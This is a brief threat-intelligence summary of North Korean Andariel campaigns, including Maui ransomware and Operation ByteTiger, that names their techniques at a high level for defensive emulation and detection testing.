Andariel is presented as a North Korean RGB-linked Lazarus subgroup with a history of espionage against South Korean government and military targets and later financially motivated ransomware activity. The emulated 2021 South Korea campaign chains a malicious access file, Mshta-delivered payloads, Simple Agent HTTP C2, Startup folder persistence, local file staging, Akdoor execution via Rundll32, discovery commands, and Maui-style file encryption. A separate Maui ransomware emulation reflects activity against healthcare and public health-related victims and other targets where DTrack, BITS jobs, process and network discovery, bookmark enumeration, C2 exfiltration, and ransomware deployment were observed. The Operation ByteTiger section adds TigerDownloader and TigerRAT behavior, including MSHTA delivery, system and peripheral discovery, masquerading, scheduled task or Run key persistence, user discovery, and registry queries. The value of the material is defensive validation: it maps Andariel tradecraft into attack graphs that can test prevention and detection controls against DPRK-linked espionage, disruption, and ransomware techniques.